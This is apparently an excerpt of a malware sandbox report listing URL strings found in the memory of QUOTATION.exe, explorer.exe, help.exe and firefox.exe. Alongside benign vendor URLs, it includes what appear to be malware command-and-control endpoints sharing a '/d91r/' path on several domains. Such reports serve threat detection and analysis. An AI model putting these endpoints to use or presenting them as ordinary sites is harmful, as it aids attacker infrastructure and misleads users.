          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maxhaidt.com
          Source: explorer.exe, 00000009.00000002.8041134967.0000000015498000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004F58000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.maxhaidt.com/
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maxhaidt.com/d91r/
          Source: explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maxhaidt.com/d91r/8H7gL=Bxcfm_qbbEGm
          Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maxhaidt.com/d91r/ldE8Xu=oYWDxG4UFF1
          Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maxhaidt.comwww.aznqmd.com
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maxhaidt.comwww.ghostdyes.net
          Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maxhaidt.comwww.maxhaidt.com
          Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.drString found in binary or memory: http://www.nero.com
          Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.popularartprints.org
          Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.popularartprints.org/d91r/
          Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.popularartprints.org/d91r/ldE8Xu=oYWDxG4UFF1
          Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.popularartprints.orgT
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8016192740.000000000AF24000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.solya-shop.com
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8016192740.000000000AF24000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.solya-shop.com/d91r/
          Source: explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.solya-shop.com/d91r/8H7gL=Bxcfm_qbbEGm
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.solya-shop.comwww.buymyenergy.com
          Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.drString found in binary or memory: http://www.symauth.com/cps0(
          Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.2.drString found in binary or memory: http://www.symauth.com/rpa00
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texasgent.com
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texasgent.com/d91r/
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texasgent.com/d91r/8H7gL=Bxcfm_qbbEGm
          Source: explorer.exe, 00000009.00000002.8041134967.000000001594E000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.000000000540E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.texasgent.com/d91r/?8H7gL=Bxcfm_qbbEGm&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhd
          Source: explorer.exe, 00000009.00000003.6305523833.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6291691505.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4931520595.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6459015891.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6279844629.0000000010A7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4737750627.0000000010A7D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texasgent.comwww.brightfms.com
          Source: QUOTATION.exe, 00000008.00000001.3526150899.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
          Source: QUOTATION.exe, 00000008.00000001.3526150899.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
          Source: explorer.exe, 00000009.00000002.8035776642.0000000010A7E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.www.fantasticserver.yachts
          Source: help.exe, 0000000A.00000002.8008447168.0000000007D95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: explorer.exe, 00000009.00000003.4747873788.000000000CFD9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000CFD9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppat
          Source: explorer.exe, 00000009.00000003.4747873788.000000000CFD9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000CFD9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppb
          Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js
          Source: QUOTATION.exe, 00000002.00000003.3065006946.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.2.drString found in binary or memory: https://aka.ms/dotnet-warnings/
          Source: explorer.exe, 00000009.00000000.4210981043.0000000009806000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8011713665.0000000009806000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
          Source: explorer.exe, 00000009.00000003.4747873788.000000000D3F5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6122981294.000000000D3F5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000D3F5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000009.00000000.4217880966.000000000D0E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4747873788.000000000D0E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8021127369.000000000D0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000009.00000000.4217880966.000000000D0E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4747873788.000000000D0E9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8021127369.000000000D0A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/a
          Source: explorer.exe, 00000009.00000003.6310377593.0000000009753000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000009.00000002.8009354628.00000000096DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6310377593.00000000096DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6123718142.00000000096DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.00000000096DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
          Source: explorer.exe, 00000009.00000000.4217880966.000000000D553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6463260519.000000000D553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4743238865.000000000D553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6120364620.000000000D553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8026780659.000000000D553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6283225298.000000000D553000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000009.00000000.4210981043.00000000098CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8011713665.00000000098E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4744694166.0000000009900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
          Source: help.exe, 0000000A.00000003.4515135577.0000000008590000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
          Source: help.exe, 0000000A.00000002.8008447168.0000000007D95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: explorer.exe, 00000009.00000002.8041134967.0000000015174000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004C34000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
          Source: help.exe, 0000000A.00000003.4515135577.0000000008590000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
          Source: QUOTATION.exe, SolutionExplorerCLI.dll.2.drString found in binary or memory: https://d.symcb.com/cps0%
          Source: QUOTATION.exe, SolutionExplorerCLI.dll.2.drString found in binary or memory: https://d.symcb.com/rpa0
          Source: QUOTATION.exeString found in binary or memory: https://d.symcb.com/rpa0.
          Source: explorer.exe, 00000009.00000003.4747263289.00000000106FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4229381389.00000000106FF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
          Source: help.exe, 0000000A.00000002.8008447168.0000000007D95000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8008447168.0000000007E03000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.10.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: help.exe, 0000000A.00000002.8008447168.0000000007D95000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8008447168.0000000007E03000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.10.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: help.exe, 0000000A.00000002.8008447168.0000000007D95000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8008447168.0000000007E03000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.10.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: explorer.exe, 00000009.00000000.4217880966.000000000CF19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8021127369.000000000CF19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8021127369.000000000CEB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000CEB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: QUOTATION.exe, 00000002.00000003.3066562321.00000000028CA000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3065006946.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.2.dr, System.dll.2.drString found in binary or memory: https://github.com/dotnet/runtime
          Source: help.exe, 0000000A.00000003.4515135577.0000000008590000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5
          Source: explorer.exe, 00000009.00000002.8041134967.00000000157BC000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.000000000527C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?c5f848a241986c827a6aea67b151df57
          Source: explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
          Source: help.exe, 0000000A.00000003.4515135577.0000000008590000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
          Source: QUOTATION.exe, 00000008.00000001.3526150899.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
          Source: explorer.exe, 00000009.00000002.8041134967.00000000157BC000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.000000000527C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://js.users.51.la/21113239.js
          Source: help.exe, 0000000A.00000002.7996001567.0000000003633000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.7996001567.0000000003615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
          Source: help.exe, 0000000A.00000002.7996001567.0000000003633000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.7996001567.0000000003615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
          Source: help.exe, 0000000A.00000002.7996001567.0000000003615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
          Source: help.exe, 0000000A.00000002.7996001567.0000000003633000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.7996001567.0000000003615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
          Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.drString found in binary or memory: https://mozilla.org0
          Source: explorer.exe, 00000009.00000002.8021127369.000000000CEB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000CEB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000009.00000000.4210981043.00000000098CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8011713665.00000000098CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
          Source: explorer.exe, 00000009.00000000.4217880966.000000000CF19000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8021127369.000000000CF19000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comM
          Source: explorer.exe, 00000009.00000002.8041134967.0000000014B2C000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.00000000045EC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://solya-shop.com/d91r/?pO=7PV8upFW6FVa3k/MU
          Source: help.exe, 0000000A.00000002.8008447168.0000000007D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
          Source: help.exe, 0000000A.00000002.8008447168.0000000007D95000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8008447168.0000000007E03000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.10.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
          Source: help.exe, 0000000A.00000002.8008447168.0000000007D95000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8008447168.0000000007E03000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.10.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: explorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell
          Source: explorer.exe, 00000009.00000002.8021127369.000000000D39C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000D39C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4747873788.000000000D39C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
          Source: explorer.exe, 00000009.00000002.8021127369.000000000CEB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4217880966.000000000CEB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com(
          Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4930128227.00000000105F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4198190622.0000000000E1C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4929197336.00000000105F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6309253673.00000000105F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6302354040.00000000105F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6315302527.00000000105F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6278355479.00000000105F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8032472066.00000000105F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6289509147.00000000105F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4227133782.00000000105F3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6456705172.00000000105F3000.00000004.00000001.00020000.00000000.sdmp, help.exe, 0000000A.00000003.4462698473.0000000007E98000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.2.dr, libpkcs11-helper-1.dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: help.exe, 0000000A.00000002.8008447168.0000000007D95000.00000004.00000020.00020000.00000000.sdmp, help.exe, 0000000A.00000002.8008447168.0000000007E03000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.10.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/new
          Source: explorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
          Source: explorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
          Source: explorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
          Source: explorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
          Source: explorer.exe, 00000009.00000002.8008551512.0000000009640000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4208684378.0000000009640000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_domains_btn&
          Source: firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/action_constructor.pl?utm_source=shopwindow&utm_medium=click&utm_campaign=sh
          Source: firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/domains/check?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow
          Source: explorer.exe, 00000009.00000002.8041134967.0000000014676000.00000004.80000000.00040000.00000000.sdmp, help.exe, 0000000A.00000002.8005674246.0000000004136000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.4515549771.00000000060A6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.webnames.ru/help/faq?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_faq&
